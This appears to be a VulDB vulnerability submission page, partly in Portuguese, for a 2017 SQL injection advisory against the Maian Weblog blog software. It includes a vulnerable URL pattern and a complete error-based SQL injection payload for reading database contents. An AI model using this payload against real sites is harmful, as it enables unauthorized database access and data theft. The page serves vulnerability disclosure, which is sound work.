Submeter #4: Maian Weblog – SQL Injectioninformação

Título	Maian Weblog – SQL Injection
Descrição	Introduction Exploit Title: Maian Weblog – SQL Injection Date: 27.01.2017 Vendor Homepage: http://www.maianweblog.com/ Exploit Author: Kaan KAMIS Contact: iletisim[at]k2an[dot]com Website: http://k2an.com Category: Web Application Exploits Overview Simple blog system for your website, Easily add/edit or delete blogs, Allow visitor comments for individual blogs, Optional e-mail notification for webmaster if comments are posted, Edit or delete visitor comments, BB Code, Calendar so visitors can view past archives, Support for multi language files, Show latest blogs/comments on blog page, Uses the Savant template engine. Type of vulnerability: An SQL Injection vulnerability in Maian Weblog allows attackers to read arbitrary data from the database. Vulnerable Url: http://locahost/weblog/blog/2[payload]/second-blog.html Mehod : GET Payload: blog/2' AND (SELECT 2995 FROM(SELECT COUNT(),CONCAT(0x71717a6a71,(SELECT (ELT(2995=2995,1))),0x717a787671,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AUvx'='AUvx/q-blog.html
Utilizador	KAAN KAMIS (UID 213)
Submissão	27/01/2017 10h11 (há 9 anos)
Moderação	27/01/2017 13h54 (4 hours later)
Estado	Aceite
Entrada VulDB	96063 [Maian Weblog 4.0 Injeção SQL]
Pontos	17

Want to stay up to date on a daily basis?

Enable the mail alert feature now!